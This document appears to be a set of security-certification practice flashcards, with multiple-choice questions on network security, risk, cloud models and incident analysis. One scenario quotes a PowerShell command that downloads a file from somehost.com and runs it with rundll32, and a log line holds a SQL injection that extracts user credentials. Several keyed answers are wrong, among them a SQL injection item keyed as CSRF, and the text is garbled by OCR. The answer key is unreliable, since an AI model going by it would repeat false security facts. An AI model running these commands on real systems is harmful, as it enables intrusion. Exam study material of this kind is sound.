101-150 Flashcards
During an internal penetration test, a security analyst identified a network device that had accepted cleartext authentication and was configured with a default credential. Which of the following recommendations should the security analvst make to secure this device?
A Configure SNMPv1.
B Configure SNMPv2c
C Configure SNMPV3.
D Configure the default community string.
C. Configure SNMPV3.
After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port
23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?
A SSH
B SNMPV3
C SFTP
D Telnet
E ETP
A. SSH
Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this best represent?
A Functional testing
B Stored procedures
C Elasticity
D Continuous integration
D. Continuous integration
Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?
A Acceptance
B Transference
C Avoidance
D Mitigation
D. Mitigation
While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?
A Utilizing SIM correlation engines
B Deploying Netflow at the network border
C Disabling session tokens for all sites
D Deploying a WAF for the web server
A. Utilizing SIM correlation engines
A company is implementing BOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the
company to meet this requirement?
A laaS
B PaaS
C MaaS
D SaaS
D. SaaS
A security analyst reviews web server logs and notices the following line:
104.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /wordpress/w-content/plugins/custom plugin/check user.php?
userid-1 UNION ALL SELECT user login, user pass, user email from w users-_
HITF/1.1” 200 1072
“http://www.example.com/wordpress/wo-admin/t
Which of the following vulnerabilities is the attacker trying to exploit?
A SSRF
B CSRF
C XSS
D SOLi
B. CSRF
An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise. Which of the following will accomplish this goal?
A Antivirus
B IPS
C ETP
D FIM
D. FIM
Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?
A A biometric scanner
B A smart card reader
C A PKItoken
D APIN pad
A. A biometric scanner
An employee received an email with an unusual file attachment named Updates Ink. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:Windows|System32\WindowsPowerShellv1.0lpowershell.exe-URI https: //somehost.com/04EB 18 jpg -OutFile Senv:TEMPlautoupdate.dil;Start-Processrundi132.exe Senv.:TEMPlautoupdate dil
Which of the following BEST describes what the analvst found?
A A PowerShell code is performing a DLL injection.
B A PowerShell code is displaying a picture.
C A PowerShell code is configuring environmental variables.
D A PowerShell code is changing Windows Update settings.
A. A PowerShell code is performing a DLL injection.
A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen.
Please use a combination of numbers, special characters, and letters in the password field
Which of the following concepts does this message describe?
A Password complexity
B Password reuse
C Password history
D Password age
A. Password complexity
A Chief Information Security Officer (CIS) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?
A PCIDSS
B GDPR
C NIST
D ISO 31000
B. GDPR
Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?
A The business continuity plan
B The retention policy
C The disaster recover plan
D The incident response plan
A. The business continuity plan
Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PI?
A SCAP
B NetFlow
C Antivirus
D DLP
D. DLP
Which of the following algorithms has the SMALLEST key size?
A DES
B Twofish
C RSA
D AES
A. DES
A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?
A MAC filtering
B Anti-malware
C Translation gateway
D VPN
D. VPN
A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage.
Which of the following BEST describes these threat actors?
A Semi-authorized hackers
B State actors
C Script kiddies
D Advanced persistent threats
D. Advanced persistent threats
A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon investigation, a security analyst identifies the following
• The legitimate website’s IP address is 10.1.1.20 and Recruit local resolves to this IP.
• The forged website’s IP address appears to be 10.2.12.99, based on NetFlow records
• All three of the organization’s DNS servers show the website correctly resolves to the legitimate P
• DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the approximate time of the suspected compromise
Which of the following MOST likely occurred?
A A reverse proxy was used to redirect network traffic.
B An SSL strip MITM attack was performed.
C An attacker temporarily poisoned a name server.
D An ARP poisoning attack was successfully executed
C. An attacker temporarily poisoned a name server.
Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a stronger preventative access control. Which of the following would BEST complete the engineer’s assignment?
A Replacing the traditional key with an RFID key
B Installing and monitoring a camera facing the door
C Setting motion-sensing lights to illuminate the door on activity
D Surrounding the property with fencing and gates
A. Replacing the traditional key with an RFID key
A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)
A Private cloud
B Saas
C Hybrid cloud
D laas
E DRaaS
F Fog computing
D. laas
F. Fog computing